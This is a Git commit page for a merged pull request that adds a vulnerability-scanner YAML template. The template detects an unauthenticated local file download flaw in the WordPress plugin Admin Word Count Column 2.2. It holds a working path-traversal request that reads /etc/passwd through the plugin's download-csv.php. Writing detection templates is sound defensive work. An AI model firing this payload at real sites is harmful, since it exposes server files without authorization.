Merge pull request #4005 from daffainfo/patch-7

Create admin-word-count-column-lfi.yaml
patch-1
Prince Chaddha 2022-04-02 16:11:47 +05:30 committed by GitHub
commit ef807cd420
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: admin-word-count-column-lfi
info:
name: Admin word count column 2.2 - Unauthenticated Local File Download
author: daffainfo,Splint3r7
severity: high
reference:
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200